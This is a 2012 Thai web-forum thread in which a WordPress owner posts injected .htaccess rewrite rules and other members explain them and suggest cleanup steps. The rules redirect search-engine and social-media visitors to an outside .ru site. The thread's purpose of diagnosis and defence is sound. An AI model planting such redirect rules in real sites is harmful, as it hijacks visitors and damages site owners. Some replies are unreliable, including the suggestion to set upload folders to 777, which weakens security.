ThaiSEOBoard.com

พัฒนาเว็บไซต์ => CMS & Free Script => ข้อความที่เริ่มโดย: มาส่องมาลอง ที่ 10 พฤษภาคม 2012, 20:09:41

หัวข้อ: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: มาส่องมาลอง ที่ 10 พฤษภาคม 2012, 20:09:41

:o โดนตัวนี้เข้าไปบน WP ไฟล์ .htaccess เว็บร่วงเลย :wanwan035: เว็บทำเงินด้วยใครช่วยแปลให้หน่อยคร้าบ มันทำไรกับเว็บผมเนี่บ ร้ายแรงมากเลยนะเนี่ย :wanwan007:

โค๊ด:

<IfModule mod_rewrite.c>																														
																														RewriteEngine On																														
																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
																														RewriteRule ^(.*)$ http://ademvoce.ru/herz?8 [R=301,L]																														
																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
																														RewriteRule ^(.*)$ http://ademvoce.ru/herz?8 [R=301,L]																														
																														</IfModule>

แปลให้ฟังหน่อยครับมันทำอะไรกับเว็บผม :wanwan004: :wanwan004: กว่าจะเจอกาน :wanwan007: ออว่าจะถามว่ามันมาทางใหนครับ ใช้บน Cpanel

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: Positron ที่ 10 พฤษภาคม 2012, 20:31:05

เนื้อหาใน .htaccess มีแค่นี้เหรอครับ

ที่จริงแล้ว ถ้ามีแค่นี้หรือเขียนไม่ครบ หรือเขียนผิด ก็อาจจะทำให้เว็บ error จนอาจเข้าไม่ได้

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: มาส่องมาลอง ที่ 10 พฤษภาคม 2012, 20:44:21

อ้างจาก: Positron ที่ 10 พฤษภาคม 2012, 20:31:05

ต้องลากสอร์บาไปขวาสุดๆๆครับเจอของดี :P

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: Soisiamdotcom ที่ 10 พฤษภาคม 2012, 21:44:45

ตัวสคริปมันจะ redirect ไปเว็บ h..p://ademvoce.ru/herz?8 ทุกการเรียกหน้าเว็บคุณครับ

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: BrainFreeze ที่ 10 พฤษภาคม 2012, 21:49:47

โดนทำ 301 Redirect ครับ

คล้ายกับประกาศว่าย้ายเว็บไซต์
ทิ้งไว้นานๆ เสีย backlink เสีย pr เลยครับ

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: มาส่องมาลอง ที่ 10 พฤษภาคม 2012, 21:53:07

อ้างจาก: BrainFreeze ที่ 10 พฤษภาคม 2012, 21:49:47

อ้างจาก: Soisiamdotcom ที่ 10 พฤษภาคม 2012, 21:44:45

ตัวสคริปมันจะ redirect ไปเว็บ [url]http://ademvoce.ru/herz?8[/url] ทุกการเรียกหน้าเว็บคุณครับ

:o ช่ายๆๆครับมันร้ายแรงมากๆๆ มานลบเว็บผมทุกที่เลย แมร่ง :'( เงินหายไป

:wanwan004: ที่ตั้งกระทู้ก็อยากให้เป็นข้อมูลสำหรับคนที่โดนนะครับ จัด + ผู้ตอบแล้วนะครับ :wanwan008: :wanwan017: :wanwan017:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: jira2712 ที่ 10 พฤษภาคม 2012, 22:04:40

ในส่วนของโปรแกรม อัฟข้อมูล file zilla ดาวโหลดฟรี ครับ ลองแก้ดูนะครับ โดยประมาณ โดยมากับตัว :wanwan003:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: nakprat ที่ 10 พฤษภาคม 2012, 22:09:30

น่ากลัวมากครับ :wanwan009:
ว่าแต่สำหรับ WP มีวิธีป้องกันไหมครับ มีปลั๊กอินตัวใดหรือ โค็ดอะไรป้องกันได้บ้าง
ขอบคุณครับ

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: m_manthai ที่ 10 พฤษภาคม 2012, 22:09:44

อ้างจาก: jira2712 ที่ 10 พฤษภาคม 2012, 22:04:40

หมายถึงโปรแกรม file zilla มักจะเป็นสาเหตหรอท่าน

แล้วทำไมหลายๆคนจึงแนะนำตัวนี้หว่า ทั้งๆที่ผมมีตัวอื่นอยู่แล้ว แต่มาใช้ตัวนี้ตามคำแนะนำของคนในเวปนี้

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: Positron ที่ 10 พฤษภาคม 2012, 22:42:25

อ้างจาก: มาส่องมาลอง ที่ 10 พฤษภาคม 2012, 20:44:21

อ้างจาก: Positron ที่ 10 พฤษภาคม 2012, 20:31:05

ต้องลากสอร์บาไปขวาสุดๆๆครับเจอของดี :P

อ๋อ ผมสกอบาร์ในกรอบนั้นไม่ได้อะครับ ก็เลยนึกว่ามีแค่นั้น :-[

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: holidaytours ที่ 10 พฤษภาคม 2012, 23:02:44

อ้างจาก: nakprat ที่ 10 พฤษภาคม 2012, 22:09:30

อาจจะเป็นที่โฮสต์ก็ได้นะท่าน
เห็นมีเพื่อนในนี้เคยบอกไว้นะครับ
:wanwan009:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: topsaler ที่ 10 พฤษภาคม 2012, 23:18:41

จากสคริป มันจะ redirect เว็บอื่น ถ้ามีTraffic มาจาก search engin
อย่างเราเข้าตรงๆมันจะไม่ redirect ต้องเข้าผ่าน search engin แล้วเข้าเกิน
1ครั้งมันก้อไม่redirectอีก คนที่ไม่สังเกตุผมว่ามีเยอะนะ อีกอย่างมันติดได้หลาย file
ไม่เฉพาะ .htaccess ของผมล่าสุด ติดใน file function.php เล่นเอาเสียหลักไป
พักนึง traffic เยอะแต่ order หาย :wanwan031:

สำหรับคนโดนไม่อยากปวดกะบานแก้เอง โยนให้ Support scanให้เลยครับ ไม่เกินชั่วโมง
เสร็จ และอัฟเดท wp เวอร์ชั่นล่าสุดด้วย เพราะที่โดนมีสาเหตุมากจากเวอร์ชั่นเก่ามีช่องโหว่ครับ

วิธีตรวจสอบง่ายๆ พิมพ์ site:เว็บของท่าน ในช่อง search engin
แล้วคลิกที่ลิงค์ ถ้า redirect ไปเว็บอื่น
แสดงว่าท่านโดนเข้าแล้ว :wanwan016:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: jira2712 ที่ 10 พฤษภาคม 2012, 23:26:31

อ้างจาก: m_manthai ที่ 10 พฤษภาคม 2012, 22:09:44

อ้างจาก: jira2712 ที่ 10 พฤษภาคม 2012, 22:04:40

file zilla ไว้สำหร้บแก้นะครับ แต่ มันเป็น open source

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: Innovation ที่ 10 พฤษภาคม 2012, 23:40:53

วิธีแก้ไขสำหรับผู้ใช้ hostgator แบบได้ผลรวดเร็วทันใจ แม่นยำเที่ยงตรง ในกรณีแบบนี้ คือ แชทคุยกับ support ให้เค้าแก้ให้เรา
ไม่เกิน 3 ชม. เรียบร้อย สบายใจ กินได้ นอนหลับ :wanwan002:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: Soisiamdotcom ที่ 10 พฤษภาคม 2012, 23:43:09

อ้างจาก: nakprat ที่ 10 พฤษภาคม 2012, 22:09:30

อย่างคำตอบด้านบนสาเหตุส่วนใหญ่จะมาจาก file zilla ถ้าจะให้ดีใช้antivirus avast ครับเพราะว่าตัวนี้สามารถสแกนแม้แต่ไฟล์ที่ถูกเข้ารหัส ปลอดไวรัสชัวร์ ขณะอัพโหลดขึ้นโฮส

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: KenjiroAPI ที่ 10 พฤษภาคม 2012, 23:47:07

ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า :P

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: try2hack ที่ 11 พฤษภาคม 2012, 00:03:07

อ้างจาก: KenjiroAPI ที่ 10 พฤษภาคม 2012, 23:47:07

ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า :P

ไม่ได้โทษ Filezilla ครับ เขสไห้ใช้ Filezilla FTP เข้าไปแก้ไห้เป็นปรกติ เพราะว่าตัวโปรแกรมมันฟรีครบั อ่านดีๆ

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: KenjiroAPI ที่ 11 พฤษภาคม 2012, 03:39:06

อ้างจาก: try2hack ที่ 11 พฤษภาคม 2012, 00:03:07

อ้างจาก: KenjiroAPI ที่ 10 พฤษภาคม 2012, 23:47:07

ผมว่าโทษ Filezilla ไม่ได้นะครับ โทษผู้ใช้ดีกว่า :P

ผมไม่ได้หมายถึงคุณครับ ผมหมายถึงโพสต์ข้างบนของผม

อ้างจาก: Soisiamdotcom ที่ 10 พฤษภาคม 2012, 23:43:09

อ้างจาก: nakprat ที่ 10 พฤษภาคม 2012, 22:09:30

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: siriyot00 ที่ 11 พฤษภาคม 2012, 03:43:18

ระวังโดนอีกรอบนะ มีรุ่นพี่ที่เป็น hacker อะ เขาบอกว่า เวลา hack เสร็จ เขาจะทำทางเข้าอะไรไว้ก็ไม่รู้ หรือผมมั่วหวา :(

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: cerberuz ที่ 11 พฤษภาคม 2012, 06:55:14

จากประสบการณ์ตรงที่ใช้ filezilla เวลาคอมติดไว้รัสมันก็จะอ่านไฟล์ xml จาก filezilla นี่แหละแล้วเข้าไปปล่อยไฟล์hack FTP ไหนที่ไม่ได้เซฟไว้ใน filezilla จะรอด แต่เว็บไหนที่มีลิสอยู่ในโปรแกรม filezilla ก็โดนยกโฮสตอนนั้นโดนไปสามโฮส :wanwan031:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: Banyoung ที่ 11 พฤษภาคม 2012, 06:58:17

ใช้ cuteftppro นี่ปลอดภัยหรือเปล่าครับ ผมใช้บ่อยซะด้วยสิ :wanwan035:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: i-wirawan.com ที่ 11 พฤษภาคม 2012, 07:28:48

ก็ อัพ .htaccess อันใหม่ไปทับซิ แล้วก็เปลี่ยน mode permission

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: AM-PM ที่ 11 พฤษภาคม 2012, 08:59:24

อ้างจาก: cerberuz ที่ 11 พฤษภาคม 2012, 06:55:14

ผมไม่เคยเชฟพวก user และ pass ไว้ แล้วไอ้ filezilla ยังจำไว้ตรงไหนบ้างครับ น่ากลัว :wanwan009:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: poakpong ที่ 11 พฤษภาคม 2012, 20:35:30

อ้างจาก: i-wirawan.com ที่ 11 พฤษภาคม 2012, 07:28:48

ก็ อัพ .htaccess อันใหม่ไปทับซิ แล้วก็เปลี่ยน mode permission

น่าจะง่ายสุดแล้ว

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: มาส่องมาลอง ที่ 11 พฤษภาคม 2012, 20:46:34

อ้างจาก: poakpong ที่ 11 พฤษภาคม 2012, 20:35:30

อ้างจาก: i-wirawan.com ที่ 11 พฤษภาคม 2012, 07:28:48

ก็ อัพ .htaccess อันใหม่ไปทับซิ แล้วก็เปลี่ยน mode permission

น่าจะง่ายสุดแล้ว

:wanwan004: :wanwan004: ก็แก้แล้วนะครับ มาไล่กด thank ให้ทุกท่าน วันนี้โดนอีกและเว็บเดิมกำลังขุดอยู่มานฝั่งไว้ตรงใหนเนี่ย :wanwan004: :wanwan004:

:-[ :wanwan007: :wanwan013:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: มาส่องมาลอง ที่ 11 พฤษภาคม 2012, 20:48:32

อ้างจาก: siriyot00 ที่ 11 พฤษภาคม 2012, 03:43:18

:wanwan004: :wanwan004: โดนเต็มๆๆ :wanwan013:

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: Soisiamdotcom ที่ 11 พฤษภาคม 2012, 21:53:17

อ้างจาก: i-wirawan.com ที่ 11 พฤษภาคม 2012, 07:28:48

ก็ อัพ .htaccess อันใหม่ไปทับซิ แล้วก็เปลี่ยน mode permission

ยังไม่ใช่ทางแก้ที่ดี เพราะว่าถ้าไวรัสมันเข้าทางFTPทางที่เจ้าของเว็บเข้ามันก็แก้permissionได้ครับ
อันดับแรกเปลี่ยนพาสเวิดFTPก่อน แล้วสแกนไวรัสในเครื่องซะแนะนำให้ใช้Avastนะครับ
แล้วก็เปลี่ยนโปรแกรมFTPไปใช้ตัวอื่น หาเอาในกูเกิ้ลครับ
อีกอย่างห้ามเซฟยูเซอร์กับพาสเวิดในโปรแกรมFTPครับ

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: ball6847 ที่ 11 พฤษภาคม 2012, 22:16:11

.htaccess ตั้ง chmod ให้ปลอดภัยหน่อย อย่าให้เขียนได้ ก่อนที่จะโดนแฮ็คนี่ตั้งไว้เท่าไหร่ครับ

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: มาส่องมาลอง ที่ 11 พฤษภาคม 2012, 22:25:38

อ้างจาก: ball6847 ที่ 11 พฤษภาคม 2012, 22:16:11

อ้างจาก: Soisiamdotcom ที่ 11 พฤษภาคม 2012, 21:53:17

อ้างจาก: i-wirawan.com ที่ 11 พฤษภาคม 2012, 07:28:48

ก็ อัพ .htaccess อันใหม่ไปทับซิ แล้วก็เปลี่ยน mode permission

ยังไม่ใช่ทางแก้ที่ดี เพราะว่าถ้าไวรัสมันเข้าทางFTPทางที่เจ้าของเว็บเข้ามันก็แก้permissionได้ครับ
อันดับแรกเปลี่ยนพาสเวิดFTPก่อน แล้วสแกนไวรัสในเครื่องซะแนะนำให้ใช้Avastนะครับ
แล้วก็เปลี่ยนโปรแกรมFTPไปใช้ตัวอื่น หาเอาในGoogleครับ
อีกอย่างห้ามเซฟยูเซอร์กับพาสเวิดในโปรแกรมFTPครับ

เปลี่ยนพาส FTP แล้วครับ วันนี้เมื่อวานลืม รอดูพรุ่งนี้ครับว่าจะโดนอีกหรือปล่าว
.htaccess ตั้ง chmod ให้ปลอดภัยหน่อย อย่าให้เขียนได้ ก่อนที่จะโดนแฮ็คนี่ตั้งไว้เท่าไหร่ครับ

จัด + อีกสองท่านครับ ว่าแต่วา่ท่านตั้งไว้ที่เท่าไรครับ ผมจะได้ไปแก้บ้างครับ

:wanwan017: :wanwan017: ขอบคุณทุกคำแนะนำเลยครับ ผมมีหลายโฮสไม่เคยมีปัญหา แต่โฮสนี้มิใหวจะเคลียเลย :wanwan004: ไม่บอกหรอกคร้าบ ผมผิดเอง

:P :P

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: anakinkong ที่ 12 พฤษภาคม 2012, 10:38:35

ผมว่า backup ข้อมูลแล้ว ก่อนครับ แล้ว ล้างโฮสเลย แล้วเอาเวปใส่ไปใหม่ อ่ะ น่าจะแก้ได้ มีไฟล์backup เวปดั้งเดิม หรือ ก่อนเอาขึ้นโฮสไหม ถ้ามีก้อสบายครับ แต่ถ้าไม่มีก้อหนักหน่อย

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: KenjiroAPI ที่ 12 พฤษภาคม 2012, 23:59:50

โฟลเดอร์ปกติให้ตั้งเป็น 755 ครับ
ไฟล์ปกติจะเป็น 644

โฟลเดอร์ที่จำเป็นต้องมีการเปลี่ยนแปลงภายใน เช่น โฟลเดอร์อัพโหลดภาพ อัดโหลดไฟล์ต่างๆ
ให้ตั้งเป็น 777 ครับ

หัวข้อ: Re: wp โดนแฮ็กบน .htaccess
เริ่มหัวข้อโดย: AFRO ที่ 13 พฤษภาคม 2012, 00:05:04

ตั้งให้เป็น 777 เฉพาะตอนที่จะแก้ไขพอครับ

SMF 1.1.21 | Simple Machines | ThaiSEOBoard.com